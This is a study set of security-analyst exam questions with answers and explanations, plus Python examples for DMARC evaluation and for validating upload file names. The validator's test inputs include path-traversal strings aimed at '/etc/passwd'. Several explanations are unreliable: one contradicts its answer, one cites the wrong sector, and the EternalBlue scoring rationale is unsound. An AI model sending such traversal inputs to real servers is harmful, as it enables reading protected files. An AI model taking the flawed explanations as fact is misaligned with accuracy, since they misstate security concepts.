A web application security specialist is examining the output of a recent web vulnerability assessment. Their primary objective is determining which vulnerabilities pose the greatest risk to the organization while considering the different stages of a cyber kill chain. Which approach should the specialist prioritize to achieve this goal? A. Focus on patching all identified vulnerabilities immediately B. Categorize vulnerabilities based on their potential impact C. Deploy a web application firewall to block malicious traffic D. Implement strong access control measures

B. Categorize vulnerabilities based on their potential impact The specialist can prioritize the most critical vulnerabilities by categorizing vulnerabilities according to their potential impact on the cyber kill chain. This approach aligns with the Open Web Application Security Project (OWASP) Testing Guide's methodology, which focuses on identifying and mitigating the most severe risks.

An administrator logged onto the Amazon Web Services (AWS) account and found that multi-factor authentication (MFA) was unnecessary to gain access. After running a quick scan using the Prowler assessment tool, the administrator discovered why MFA was not running. What part of the report confirmed the administrator's suspicions? A. Check service name column B. Check status extended column C. Check severity column D. Check rules column

B. Check status extended column The status extended column provides more information on the security finding. In this case, the description may state, "MFA is not enabled for root account."

Which statement best explains the importance of cloud system and network architecture concepts in security operations as they relate to hybrid and on-premises systems? A. Cloud system and network architecture concepts are only useful for securing cloud-based systems. B. Cloud system and network architecture concepts are essential for securing both hybrid and on-premises systems. C. Cloud system and network architecture concepts are important for securing on-premises systems, not hybrid systems. D. Cloud system and network architecture concepts are not important for securing hybrid or on-premises systems.

B. Cloud system and network architecture concepts are essential for securing both hybrid and on-premises systems. Knowledge of cloud system and network architecture concepts is essential for securing both hybrid and on-premises systems.

After an incident, the incident response team wants to ensure that the organization can learn from the incident and improve its overall incident response capabilities. Which of the following steps should the team take to do this? A. Describe the impact on customers and partners B. Conduct a lessons learned review C. Conduct a timeline analysis D. Notify customers

B. Conduct a lessons learned review Conducting a lessons-learned review can help the incident response team identify areas for improvement in incident response capabilities and develop measures to address them.

A software development company is looking to enhance its security practices by incorporating attack methodology frameworks into its vulnerability assessment process. The company's management wants to ensure its web applications are secure against known threats and attack techniques. Which of the following actions should the company prioritize to integrate these frameworks and improve its security posture? A. Purchase and deploy additional antivirus software B. Conduct regular penetration testing of web applications C. Increase the frequency of security awareness training D. Upgrade network infrastructure

B. Conduct regular penetration testing of web applications By conducting regular penetration testing and aligning testing methodologies with frameworks like MITRE ATT&CK and Open Web Application Security Project (OWASP) Testing Guide, the company can ensure its web applications are secure against known threats and attack techniques.

A healthcare organization has experienced a data breach that has compromised patient records. How should the organization establish an order of events for the breach? A. Discover evidence B. Create a timeline of breach C. Determine stakeholders impacted D. Declare an incident

B. Create a timeline of breach Creating a timeline is critical to understanding how the attack unfolded and identifying potential weaknesses in the organization's security posture. It establishes an order of events for the breach.

When performing reconnaissance on multiple websites, how would a security engineer organize information to keep all reconnaissance campaigns isolated from one another in recon-ng? A. Create backdoors B. Create workspaces C. Add domains D. Add payloads

B. Create workspaces Workspaces organize different reconnaissance campaigns in recon-ng, each with its own database of hosts, contacts, and credentials. Therefore, the security engineer should create one workspace per target and switch between them as needed so that findings from one campaign never mix with another.

The IT team at a company wants to implement additional security measures to prevent recent phishing attempts against their employees. The team will use Domain-based Message Authentication, Reporting and Conformance (DMARC), Sender Policy Framework (SPF), and DomainKeys Identified Mail (DKIM) to secure the email system. Which of the following statements is true regarding DMARC, SPF, and DKIM in the context of email security operations A. DMARC, SPF, and DKIM are all email security protocols that use encryption to protect emails from phishing attempts. B. DMARC, SPF, and DKIM are all email security protocols that use digital signatures to authenticate emails and prevent spoofing. C. DMARC, SPF, and DKIM are all email security protocols that use machine learning to detect and block spam emails. D. DMARC, SPF, and DKIM are all email security protocols that use firewalls to prevent unauthorized access to emails.

B. DMARC, SPF, and DKIM are all email security protocols that use digital signatures to authenticate emails and prevent spoofing. Of the options given, B is the closest, but the three mechanisms work differently and only one of them signs anything. Sender Policy Framework (SPF) publishes in DNS the IP addresses authorized to send mail for a domain, and the receiver checks the connecting server against that list. DomainKeys Identified Mail (DKIM) applies a cryptographic signature over selected headers and the body, which the receiver verifies with a public key fetched from DNS, proving the message was not altered in transit and was handled by the signing domain. Domain-based Message Authentication, Reporting, and Conformance (DMARC) requires that a passing SPF or DKIM result align with the visible From domain and tells receivers what to do when neither does (none, quarantine, or reject), while sending the domain owner reports on who is sending as that domain. Together they make spoofing of the sender's domain detectable and give the organization the data to see phishing attempts that impersonate it.
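As an added example, not part of the study set, the following Python carries out the DMARC decision described above from the results a receiver already has: the SPF result with its MAIL FROM domain, the DKIM result with its d= domain, and the published DMARC record. It shows why a spoofed message that passes SPF and DKIM for the attacker's own domain still fails DMARC, and how strict versus relaxed alignment changes the outcome. The record and domains are constructed, and the two-label organizational-domain rule is a simplification of the public suffix list.

```python
def parse_dmarc_record(record):
    """'v=DMARC1; p=reject; adkim=s' -> {'v': 'DMARC1', 'p': 'reject', 'adkim': 's'}"""
    tags = {}
    for part in record.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    return tags


def org_domain(domain):
    # Assumption: organizational domain = last two labels (real code uses the public suffix list)
    return ".".join(domain.lower().rstrip(".").split(".")[-2:])


def aligned(auth_domain, from_domain, mode):
    """Strict ('s') needs an exact match; relaxed ('r') needs the same organizational domain."""
    a, f = auth_domain.lower().rstrip("."), from_domain.lower().rstrip(".")
    return a == f if mode == "s" else org_domain(a) == org_domain(f)


def dmarc_evaluate(from_domain, spf, dkim, policy):
    """spf = (result, MAIL FROM domain); dkim = (result, d= domain from the signature).
    Returns (dmarc_result, action) where action is the p= disposition to apply on failure."""
    spf_ok = spf[0] == "pass" and aligned(spf[1], from_domain, policy.get("aspf", "r"))
    dkim_ok = dkim[0] == "pass" and aligned(dkim[1], from_domain, policy.get("adkim", "r"))
    if spf_ok or dkim_ok:
        return "pass", "none"
    return "fail", policy.get("p", "none")


if __name__ == "__main__":
    # Constructed record for example.com: reject on failure, strict DKIM, relaxed SPF
    policy = parse_dmarc_record("v=DMARC1; p=reject; adkim=s; aspf=r; rua=mailto:dmarc@example.com")
    print("legit   :", dmarc_evaluate("example.com", ("pass", "bounce.example.com"), ("none", ""), policy))
    print("spoofed :", dmarc_evaluate("example.com", ("pass", "attacker.net"), ("pass", "attacker.net"), policy))
    print("strict  :", dmarc_evaluate("example.com", ("none", ""), ("pass", "mail.example.com"), policy))
```

Note what the IT team in the question gains from each piece: SPF and DKIM alone only say something about the domain in the envelope or the signature, which an attacker controls; DMARC's alignment requirement is what ties those results to the From address the employee actually sees.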

A financial institution's security analyst must discover any active threats to the network. The analyst relies on the OSSTMM and OWASP Testing Guide to effectively monitor and analyze these threats. After receiving an alert regarding a potential spear-phishing attack, what should be the analyst's initial priority when evaluating the situation? A. Implementing security measures recommended by the OSSTMM B. Detecting threat markers and weaknesses C. Evaluating the organization's web applications for security vulnerabilities D. Assessing the company's security protocols and procedures.

B. Detecting threat markers and weaknesses By using the Open Source Security Testing Methodology Manual (OSSTMM) and the Open Web Application Security Project (OWASP) Testing Guide to assess an active threat like a spear-phishing attack, the analyst can determine the scope and potential impact of the threat to help guide response actions effectively.

A company is struggling to keep up with the latest cybersecurity threats. They have been victims of several data breaches in the past year, and some customers are starting to lose confidence. The company's CEO has asked the CISO to devise a plan to improve the company's cybersecurity posture. Which of the following is the most important factor in improving the company's cybersecurity posture at the CISO's level? A. Prioritizing threat actors by impact B. Developing a strong organizational governance framework C. Mitigating the vulnerabilities in order of the number of affected hosts by a potential breach D. Mitigating the vulnerabilities, which provides opportunities to replace primary controls with compensating controls first

B. Developing a strong organizational governance framework Organizational governance is the process of setting and enforcing the rules that govern how an organization operates. It is essential to cybersecurity because it assigns responsibility, sets policy, and ensures that systems are secured consistently rather than one breach at a time. The chief information security officer (CISO) is responsible for selecting the organizational governance frameworks the security program follows.

A web application permits users to upload images for their profile pictures. However, the application does not properly sanitize the filenames, and an attacker uploads a file with a malicious filename. By manipulating the filename, the attacker can access files on the server without authorization to access. What type of vulnerability does this situation describe? A. CSRF B. Directory traversal C. Broken access control D. Injection

B. Directory traversal Directory traversal is a web application vulnerability where an attacker can access files outside of the intended directory by manipulating user input, such as a filename.
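As an added example, not code from the study set, the following Python shows the filename handling the profile-picture upload above was missing: the name is accepted only if it is a bare file name, and the resolved path is then confirmed to be a direct child of the upload directory. The upload directory and the percent-encoded test names are assumptions for the example.

```python
from pathlib import Path
from urllib.parse import unquote

UPLOAD_ROOT = Path("/var/app/uploads")   # assumed location of profile pictures


def is_safe_upload_name(filename):
    """True only for a bare file name: no separators, no NUL byte, not '.' or '..'."""
    name = unquote(filename)                      # decode once so ..%2F is seen as ../
    if not name or name in (".", "..") or "\x00" in name:
        return False
    if "/" in name or "\\" in name:               # reject both separator styles
        return False
    return True


def resolve_upload_path(filename, root=UPLOAD_ROOT):
    """Map a user-supplied name to a path guaranteed to sit directly inside root.
    Raises ValueError for anything that would land elsewhere."""
    if not is_safe_upload_name(filename):
        raise ValueError(f"rejected file name: {filename!r}")
    root = Path(root).resolve()
    candidate = (root / unquote(filename)).resolve()
    # Second line of defense: even after the name check, the resolved path must be a
    # direct child of root. This also catches a symlink planted inside the directory.
    if candidate.parent != root:
        raise ValueError(f"path escapes upload directory: {candidate}")
    return candidate


if __name__ == "__main__":
    for name in ["avatar.png", "../../etc/passwd", "..%2F..%2Fetc%2Fpasswd", "/etc/passwd"]:
        try:
            print(name, "->", resolve_upload_path(name, "/tmp/uploads_example"))
        except ValueError as err:
            print(name, "->", err)
```

Decoding exactly once matters: decoding twice would turn a harmless literal "%252F" into a separator, and not decoding at all would let "..%2F" through to a lower layer that decodes it later. Many applications sidestep the problem entirely by generating a server-side name (for example a random identifier with a checked extension) and keeping the user's original name only as metadata; the checks above are still useful wherever the original name is reused on disk.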

A company has used an old software version for years without updating it due to compatibility issues with the new version. The vendor no longer supports the software, and a network administrator discovered a vulnerability that an attacker could exploit from the internet to gain unauthorized access to the software. What kind of vulnerability best describes this situation? A. CSRF B. EOL C. Broken access control D. Injection

B. EOL End of life (EOL) occurs when a vendor or manufacturer no longer supports a software product or hardware device. EOL leaves a software product or hardware device open to known and unknown security vulnerabilities.

A large retail chain has recently experienced a significant data breach, and the IT security team is working to prevent future breaches. As the team analyzes network traffic, they discover that the attacker was able to gain access through a previously unknown and publicly accessible entry point. What should be the team's top priority? A. Passive discovery B. Edge discovery C. Parameterized queries D. Network discovery

B. Edge discovery Edge discovery seeks to define the "edge" of the network entirely, representing every device with internet connectivity. Therefore, anything accessible to the internet is part of the edge. Since a previously unknown publicly accessible device was the source of the compromise, edge discovery is the top priority.

After scanning a website with the Burp Suite scanning tool, the web administrators ask for the web URL paths associated with the specific findings. Where can a security analyst find these URL paths in the tool? A. Target section B. Extender section C. Dispatcher's section D. Profiles section

A. Target section The Target tab's Site map lists every host and URL path Burp has seen, and the Issues pane beside it shows the findings at each path; opening an issue also shows the exact request URL that triggered it. The Extender section, by contrast, is only for loading third-party extensions that change the tool's behavior when performing scans, and it does not display URL paths.

The chief information officer (CIO) has scheduled the quarterly vulnerability scan with a well-trusted vendor for Payment Card Industry Data Security Standard (PCI DSS). What particular scan provides a view of the company's internet-facing systems? A. Internal scanning B. External scanning C. Credentialed D. Non-credentialed

B. External scanning External scans focus on the view of devices and services from the "outside" of the network, broadly referring to the Internet, whereas internal scans focus on the view from the "inside."

A security analyst is scheduling a vulnerability scan on several company critical systems. Which of these performance factors does the analyst need to consider that could impact the scan? (Select the three best options.) A. Sensitivity levels B. False positives C. Scan speed D. System identification

B. False positives C. Scan speed D. System identification When performing vulnerability scans, the scanner can report false positives. Therefore, it is important to identify and manage false positives to reduce the time spent researching and validating them and to increase the accuracy of the scan results. Scan speed matters because it trades off against accuracy and system load: a scan that runs too aggressively can overwhelm a critical host or time out and miss vulnerabilities, while one that runs too slowly may not finish inside its window. Identifying the operating system and services of the target system is essential to ensure that the correct vulnerability checks get applied to the system.

A company has increased the security operation center (SOC) budget to reassess its cybersecurity framework. The current company's framework revolves around the National Institute of Standards and Technology (NIST) guidelines. Which other organization frameworks could the SOC use its budget to achieve a better security posture? A. OWASP B. ISO C. GDPR D. FISMA

B. ISO The International Organization for Standardization (ISO) develops many standards and frameworks governing the use of computers, networks, and telecommunications. These documents must be purchased, and the additional budget allows the SOC to acquire them from behind the paywall, which benefits the company's security posture.

A cybersecurity analyst must implement measures to address identified vulnerabilities in their organization's systems for security operations. While the analyst can fully remediate some vulnerabilities, others may require alternative strategies. Which of the following actions would best suit situations where full remediation is not feasible? A. Conduct penetration testing on a regular basis to discover new vulnerabilities B. Implement compensating controls to reduce the risk associated with the vulnerabilities C. Encrypt all organizational data using the strongest available encryption algorithm D. Share the identified vulnerabilities with other organizations to gather their insights

B. Implement compensating controls to reduce the risk associated with the vulnerabilities When full remediation of a vulnerability is not feasible, implementing compensating controls can help reduce the associated risks and protect the organization's systems. These controls serve as alternative measures to manage the risk.

A video gaming company is preparing a security patch to fix a known non-critical vulnerability in their game. What is the best way to approach deploying this patch as an administrator? A. Implement immediately to prevent exploitation B. Implement during the maintenance window C. Test the patch D. Roll back the previous update that generated the vulnerability to patch

B. Implement during the maintenance window Maintenance windows enable preventative maintenance and consistent deployment of non-critical patches. All work planned during maintenance windows should comply with change management policies.

A manufacturing company has recently suffered a successful cyber attack, leading to data integrity concerns. The organization's leadership is determined to implement appropriate controls to mitigate the risk of future attacks. Which of the following controls would be most effective in validating data integrity and preventing a recurrence of similar attacks? A. Re-image all systems on a regular basis B. Implement file integrity monitoring C. Deploy a network intrusion detection system D. Create an incident response team

B. Implement file integrity monitoring File integrity monitoring continuously checks and validates data integrity by detecting unauthorized changes to critical files. This helps protect the organization from similar attacks by identifying and responding to potential threats in real time.

A software development company is concerned about the security of its applications and wants to ensure the proper preservation of data and log analysis. The company needs advice on enhancing its security practices while considering the programming languages used in its applications. Which of the following actions would be most appropriate for the company to take to address its concerns? A. Adopt a standardized logging framework for consistent log generation B. Implement secure coding practices in the programming languages the company uses C. Conduct regular code reviews with a focus on security D. Implement proper input validation and output encoding

B. Implement secure coding practices in the programming languages the company uses By implementing secure coding practices in the programming languages it uses, the company can minimize vulnerabilities and improve data preservation and log analysis, directly addressing its concerns.

A large organization has recently experienced a significant cyberattack that disrupted its daily operations. The organization's management team reviews the incident and improves its business continuity and disaster recovery strategies. They want to focus on patch management concepts as part of the lessons learned. Which patch management best practices would most effectively enhance their BC/DR preparedness? A. Establishing a centralized patch management system B. Implementing a risk-based patch prioritization C. Prioritizing updates based on vendor recommendations D. Coordinating patch management with change management processes

B. Implementing a risk-based patch prioritization A risk-based approach to patch prioritization helps ensure that the organization addresses the most critical vulnerabilities first, reducing the overall risk and improving the organization's resilience to cyberattacks or other disasters.

A large organization suffered a major data breach and tasked the cybersecurity team with conducting a forensic analysis to understand the extent of the damage and identify potential vulnerabilities. The team must learn from this incident and apply this knowledge to their system and network architecture. Which of the following steps is most crucial in effectively applying the lessons learned to improve the organization's security posture? A. Collecting and preserving digital evidence B. Implementing architectural changes based on findings C. Conducting regular network traffic analysis D. Performing vulnerability assessments on key systems

B. Implementing architectural changes based on findings The organization can address the identified vulnerabilities and improve its overall security posture by applying the lessons learned from the forensic analysis to make architectural changes in the system and network infrastructure.

A company's cybersecurity team wants to improve their threat intelligence capabilities. The team is responsible for protecting the organization's sensitive information from cyber threats. Which of the following strategies can improve the effectiveness of the cybersecurity team? A. Utilizing data enrichment techniques B. Improving team coordination and communication C. Conducting regular vulnerability assessments D. Utilizing threat feed combination techniques

B. Improving team coordination and communication Effective team coordination and communication are crucial for a successful cybersecurity program because they allow team members to share information and knowledge and enable a better response to cyber threats by ensuring a clear understanding of roles and responsibilities.

Which of the following is an example of a key performance indicator (KPI) that can indicate a trend in an organization's cybersecurity incidents over time? A. Detection time B. Indicators of compromise (IoCs) C. Resource allocation D. Risk assessment

B. Indicators of compromise (IoCs) By tracking these key performance indicators (KPIs) over time, organizations can determine if the indicators of compromise (IoCs) are increasing in their environment, indicating a trend in cybersecurity incidents.

An organization is committed to continuous improvement in its incident response process. A recent cyber attack resulted in a legal hold on certain systems, and now the organization must decide on the best approach to handle this situation. Which of the following actions would be most appropriate for the organization in the context of continuous improvement? A. Wait for the organization to lift the legal hold before taking action B. Isolate and preserve the data on affected systems while deploying backup systems for operational continuity C. Perform a network-wide vulnerability scan D. Perform a risk assessment for the entire organization

B. Isolate and preserve the data on affected systems while deploying backup systems for operational continuity Re-imaging the affected systems helps restore normal operations quickly while preserving evidence for the legal hold. It aligns with the continuous improvement goal of minimizing downtime and responding effectively to incidents.

An analyst is reviewing logs and notices unusual traffic spikes and activity on unexpected ports. Further investigation reveals that the traffic originates from a group of servers on the network. What is the best course of action for the analyst to take in response? A. Ignore the unusual activity as it may be a false positive or a normal activity B. Isolate the affected servers from the network to prevent further malicious activity and initiate incident response procedures C. Shut down the affected servers and restore them from the most recent backup D. Deploy additional network monitoring tools to investigate the source of the traffic

B. Isolate the affected servers from the network to prevent further malicious activity and initiate incident response procedures To prevent the further spread of the attack and minimize the impact of the incident, the analyst should disconnect the affected servers from the network and initiate incident response procedures.

The cybersecurity team at a large organization is conducting a forensic analysis after a security breach. As part of the investigation, they need to examine the identity and access management (IAM) system to identify any unauthorized access or compromised accounts. What can the team use to most effectively achieve this goal during forensic analysis? A. Network traffic analyzers B. Log analysis tools C. Digital forensics imaging tools D. Endpoint protection software

B. Log analysis tools Log analysis tools can help the cybersecurity team analyze IAM logs, detect unauthorized access attempts or compromised accounts, and provide insights into any vulnerabilities or policy violations in the IAM system.

An organization has experienced a data breach. The organization hires a digital forensics investigator to identify the source of the breach, determine its impact, and provide guidance on improving its security. Which of the following actions is most crucial for the investigator during this process? A. Upgrade the organization's firewalls and intrusion prevention systems B. Maintain thorough documentation of digital evidence handling C. Implement multi-factor authentication for remote access D. Organize a security awareness training program for employees

B. Maintain thorough documentation of digital evidence handling Proper documentation is critical for upholding the integrity and admissibility of digital evidence. This approach aligns with the investigator's role in tracing the breach source and evaluating its consequences while ensuring a transparent investigation process.

The security team at a large organization is reviewing its incident response activities after a recent cyberattack. They want to understand the different stages of the attack, identify gaps in their defenses, and develop an effective response strategy for future incidents. What should the team focus on to comprehensively analyze the incident response activities? A. Deploy additional antivirus software B. Map incident response activities to attack stages C. Restrict access to sensitive data D. Upgrade network infrastructure

B. Map incident response activities to attack stages By mapping incident response activities to the stages of the cyber kill chain and MITRE ATT&CK framework, the security team can identify gaps in their defenses and response strategies. This approach allows the team to better understand the effectiveness of their incident response capabilities and make informed decisions for improvement.

A company is considering entering into a collaboration with a potential partner. The potential partner is a large, well-respected company with a strong track record in cybersecurity. The company has a concern about the potential partner's ability to comprehend and meet all its needs per its standard operating procedures. What should the company implement to ensure mutual comprehension and agreed communication methods, short of legal recourse? A. Service-level agreement (SLA) B. Memorandum of understanding (MoU) C. Organizational governance D. Configuration management

B. Memorandum of understanding (MoU) A memorandum of understanding (MoU) outlines the terms and conditions of an agreement between two or more parties but is not legally binding. The company does not need legal recourse in this case, making an MoU suitable.

What is one of the primary goals of a security operations center (SOC) manager when implementing a security orchestration, automation, and response (SOAR) solution? A. Create webhooks B. Minimize human engagement C. Generate a cousin domain D. Conduct risk management

B. Minimize human engagement Security orchestration, automation, and response (SOAR) automates well-documented, highly procedural actions taken in response to specific SIEM-generated alerts. When something triggers an alert, the system can analyze it by following a defined set of instructions, minimizing human engagement.

A web administrator reviews a scan report of a web server that suggests a site allows for directory listings remotely and that the organization should upgrade the server to version 2.5.3 or higher. The report also shares a few other PHP errors. Which of the following tools would provide this information via the command line only? A. Arachni B. Nikto C. Zed Attack Proxy (ZAP) D. Burp Suite

B. Nikto Nikto is a web application scanner that uses the command line interface. It discovers the type of HTTP server and web applications running on a host.

Using the Zenmap Graphical User Interface (GUI), the security administrator can quickly scan a network and map its topology in concentric rings where each ring represents a hop from the central node. Which tool is the security administrator using in this case? A. Recon-ng B. Nmap C. Immunity debugger D. GNU debugger

B. Nmap The Zenmap GUI is available on the Nmap tool. It provides color highlighting and visual features to map out the network in a simple topology layout with concentric rings.

A company is concerned about the security of its web applications and wants to perform a comprehensive security assessment. They want to ensure their applications are free from common web vulnerabilities, such as SQL injection, cross-site scripting (XSS), and CSRF. Which of the following testing methodologies should the company use? A. MITRE ATT&CK B. OWASP Testing Guide C. Open Source Security Testing Methodology Manual D. Cyber kill chain

B. OWASP Testing Guide The Open Web Application Security Project (OWASP) Testing Guide is a comprehensive guide to testing web applications for vulnerabilities. It includes detailed testing methodologies for common web vulnerabilities such as structured query language (SQL) injection, cross-site scripting (XSS), and cross-site request forgery (CSRF).

A security analyst is investigating a recent cyberattack on their organization's web applications. The investigation must assess the web application vulnerabilities while accounting for the special considerations that apply to vulnerability scanning of web applications. Which framework should the analyst utilize to achieve this objective? A. MITRE ATT&CK Framework B. OWASP Testing Guide C. Cyber kill chain D. NIST Cybersecurity Framework

B. OWASP Testing Guide The Open Web Application Security Project (OWASP) Testing Guide provides a comprehensive methodology for assessing web application vulnerabilities, considering any special aspects of vulnerability scanning for web applications.

A security analyst needs to identify vulnerabilities in the organization's network infrastructure. They need to understand the stages of an attack and use a comprehensive testing methodology that considers the context of vulnerabilities. Which of the following should the analyst use to effectively achieve these goals? A. Cyber kill chain B. Open Source Security Testing Methodology Manual (OSSTMM) C. Open Web Application Security Project (OWASP) Testing Guide D. Diamond Model of Intrusion Analysis

B. Open Source Security Testing Methodology Manual (OSSTMM) The OSSTMM is a comprehensive security testing methodology that takes the context of each vulnerability into account. It provides a systematic approach to identifying and assessing vulnerabilities in various systems, including network infrastructure.

An information security project manager of a large corporation suggests the security operations center (SOC) should replace the current vulnerability scanner with a more cost-efficient alternative that still retains the capabilities of their current closed-source software (proprietary software). At the next board meeting, which vulnerability scanner should the project manager propose? (Select the two best options.) A. Qualys B. OpenVAS C. OpenSCAP D. Nessus

B. OpenVAS C. OpenSCAP The OpenVAS scanner (openvas.org) is open-source software initially developed from the Nessus codebase before Nessus became commercial software. The cost efficiency of the open-source scanner, while retaining the ability to produce CVSS scores, makes OpenVAS optimal for this scenario. OpenSCAP is an open-source scanner used to identify system vulnerabilities. It also provides the ability to calculate a Common Vulnerability Scoring System (CVSS) score based on the vulnerabilities identified in the system.

Which security control category do people primarily implement? A. Technical B. Operational C. Preventative D. Managerial

B. Operational People primarily implement operational controls (a control category) rather than systems. For example, security guards and training programs are operational controls rather than technical controls.

A security operations center (SOC) analyst is preparing for a meeting with an upset client. The client protests that the vulnerability scans were not implemented according to their change management procedures, causing a severe interruption in their critical systems' performance. During the meeting, what process should the analyst focus on to ensure the service level objectives (SLOs) meet expectations? A. Scheduling B. Operations C. Compliance D. CIS benchmarks

B. Operations Operations focus more on change management procedures to ensure all impacted parties know about scanning activity.

A company's security team recently discovered an unknown device connected to their network, and they suspect it could be a rogue device. The team wants to conduct scans and sweeps to locate and remove any unauthorized devices on the network. Which of the following are common types of scans or sweeps the team can use to locate rogue devices in the network? (Select the two best options.) A. Port scanning B. Passive scanning C. Active scanning D. Network mapping

B. Passive scanning C. Active scanning Passive scanning is a method that listens to network traffic without actively sending traffic. It can detect rogue devices that are active on the network but not responding to standard requests. Active scanning is a method that sends traffic to a network to identify devices that are active on the network. It is an effective method for identifying rogue devices actively responding to requests.

A financial organization is improving its security posture to meet regulatory compliance requirements. One of the critical aspects they need to address is the validation of data integrity in the context of the indicator of compromise (IoC). Which of the following methods would be most effective for the organization to achieve this goal? A. Encrypt data B. Perform frequent vulnerability scans C. Use multi-factor authentication D. Install antivirus software

B. Perform frequent vulnerability scans Regular vulnerability scans identify security weaknesses and potential IoCs within an organization's network and systems, which helps validate data integrity and maintain compliance with healthcare regulations.

An organization recently faced a cyber incident that caused a disruption in their operations. The cybersecurity team wants to strengthen their resilience strategies and address potential threats before they cause significant harm. To identify the root cause of the recent incident and improve their operational preparedness, which of the following approaches would be most effective? A. Examining past logs B. Performing a hypothesis-driven investigation C. Monitoring the network in real time D. Testing critical systems for vulnerabilities

B. Performing a hypothesis-driven investigation A hypothesis-driven investigation involves proactively searching for potential threats based on specific assumptions. This allows the team to focus on possible causes and identify previously unknown issues, improving the organization's operational preparedness.

A security analyst must evaluate the security of a web application. Which tools or methods would be most useful in identifying potential vulnerabilities in the application's code? A. Performing a penetration test on the web application B. Performing static application security testing C. Conducting manual code review D. Conducting tabletop exercises

B. Performing static application security testing Static application security testing (SAST) analyzes the source code or compiled versions of an application to identify potential security vulnerabilities, making it the most appropriate tool for this scenario.

A security analyst performing security operations on a company's network needs to use PowerShell and shell scripts to automate tasks and streamline processes. Which of the following correctly defines PowerShell and shell script in the context of security operations? A. PowerShell is a set of commands written in a specific language that runs on a Unix-based operating system, while a shell script is a command-line interface that allows you to manage and automate Windows-based operating systems. B. PowerShell is a command-line interface that allows the user to manage and automate Windows-based operating systems, while a shell script is a set of commands written in a specific language that runs on a Unix-based operating system. C. PowerShell and shell script are two different names for the same thing - a command-line interface that allows you to manage and automate operating systems. D. PowerShell and shell script ar

B. PowerShell is a command-line interface that allows the user to manage and automate Windows-based operating systems, while a shell script is a set of commands written in a specific language that runs on a Unix-based operating system. PowerShell facilitates the management and automation of Windows-based operating systems by providing a command-line interface. Shell script is a set of commands written in a specific language that runs on a Unix-based operating system. Although PowerShell and shell script are both tools that automate tasks, they are not interchangeable and require different approaches to accomplish similar tasks.

In a recent cyber attack on a large multinational corporation, the attack appears to have compromised sensitive customer information. Which of the following steps should the incident response team take after partially notifying management and assessing the potential impact of the compromise to ensure effective incident management? A. Contact regulatory bodies B. Prepare an incident declaration for approval by senior management C. Perform a full forensic investigation of the affected systems D. Contact the media

B. Prepare an incident declaration for approval by senior management Incident declaration and escalation are critical components of the incident response process. In a major cyber attack, it is important to promptly notify key stakeholders, and a formal incident declaration aids this process.

A SOC manager is building a business case to increase the use of automation. What are some of the primary benefits the manager could highlight? (Select the two best options.) A. Improving OSINT collection B. Preventing human error C. Reducing manual labor D. Increasing the use of plugins

B. Preventing human error C. Reducing manual labor Automating processes removes human interaction. This ensures that the system follows security processes consistently and without the human error that can result from operator fatigue. This is a significant benefit of automation. Reducing manual labor on a given task frees up analysts' time, allowing managers to redirect them toward other tasks.

What process evaluates the structure of hardware or software to reveal more about its unknown functions? A. Static analysis B. Reverse engineering C. Dynamic analysis D. Fuzzing

B. Reverse engineering Reverse engineering describes deconstructing software and/or hardware to determine how developers create them.

A tire sales and servicing company has implemented a security patch to fix a known vulnerability in their ordering system on their web server, but shortly after implementation, the company receives calls from customers that the ordering system is no longer functioning as intended. What is the best course of action? A. Validation B. Rollback C. Testing D. Implementation

B. Rollback Patch rollback reverts patches or configuration changes to their previous state in the event of unexpected issues or failures that arise after the system administrator has implemented the patch.

A large-scale business needs a system to control field devices with embedded PLCs on multiple sites spread over a large geographical area. What system should an information security program manager choose to best suit the coverage needed for this business? A. ICS B. SCADA C. DCS D. HMI

B. SCADA Supervisory control and data acquisition (SCADA) is an industrial control system that manages large-scale, multiple-site devices and equipment spread over geographically large areas from a host computer.

A company's security operations center (SOC) wants to minimize human engagement in its threat response process. Which of the following techniques can help achieve this goal? (Select the two best options.) A. Regular security awareness training for employees B. SOAR C. SIEM D. Improving team coordination and communication

B. SOAR C. SIEM Security orchestration, automation, and response (SOAR) is a solution that automates security operations and integrates security tools, allowing organizations to improve their ability to detect and respond to threats quickly and efficiently. Security information and event management (SIEM) is a security solution that aggregates and analyzes security data from various sources to identify potential security threats.

A security analyst working for a large financial institution is implementing Sender Policy Framework (SPF) and DomainKeys Identified Mail (DKIM), which the company has decided to adopt to improve email security. Which of the following statements best describes SPF? A. SPF is a cryptographic protocol that ensures message confidentiality. B. SPF is an email authentication method that detects forged sender addresses in emails. C. SPF is a protocol used to encrypt email messages in transit. D. SPF is a protocol used to control access to network resources.

B. SPF is an email authentication method that detects forged sender addresses in emails. SPF is an email authentication method that detects forged sender addresses in emails. SPF verifies that the IP address of the sending mail server matches one of the addresses listed in the DNS SPF record published for the domain from which the email claims to originate.

A cybersecurity analyst for a small company ensures the company's email security by configuring Sender Policy Framework (SPF) and DomainKeys Identified Mail (DKIM). The analyst needs to explain to other employees how SPF and DKIM work together. Which of the following statements correctly explain the role of SPF and DKIM in securing email communications? (Select the two best options.) A. SPF verifies the message content while DKIM verifies the source IP address of incoming messages. B. SPF verifies the source IP address of incoming messages while DKIM verifies the message content. C. SPF and DKIM together prevent email spoofing and ensure message authenticity. D. SPF and DKIM work together to scan for malware.

B. SPF verifies the source IP address of incoming messages while DKIM verifies the message content. C. SPF and DKIM together prevent email spoofing and ensure message authenticity. SPF verifies the source IP address of incoming messages, while DKIM verifies the message content by attaching a digital signature to the email header. Together, they provide a strong defense against email forgery and ensure that email messages are legitimate and trustworthy. Sender Policy Framework (SPF) and DomainKeys Identified Mail (DKIM) are both email authentication protocols that work together to protect against email spoofing and ensure message authenticity.

EternalBlue, also known as CVE-2017-0148, has a CVSS score of 9.3. It is an exploit that allows remote attackers to execute arbitrary code via crafted packets and applies to many Windows operating systems prior to recent versions of Windows 10, an extremely popular and ubiquitous operating system. Which CVSS metric is likely the most influential factor in generating such a high CVSS score? A. Privacy B. Scope C. Availability D. Impact

B. Scope The scope is the biggest reason for the high Common Vulnerability Scoring System (CVSS) score due to its wide-reaching impact. The Windows operating system has over a 74% market share and is ubiquitous worldwide.

A cyber security analyst has performed a scan of multiple target endpoints on the network. The scan assesses the target endpoints' configurations and cross-references them against an appointed profile. This scan ensures that devices and software maintain compliance with security requirements continuously. What type of scanning is the analyst performing? A. CIS benchmarks B. Security baseline C. Map/Discovery D. Internal

B. Security baseline The cyber security analyst is using security baseline scanning tools to evaluate endpoints against a baseline. It helps the analyst uncover less obvious problems and ensure devices and software maintain compliance with security requirements at all times.

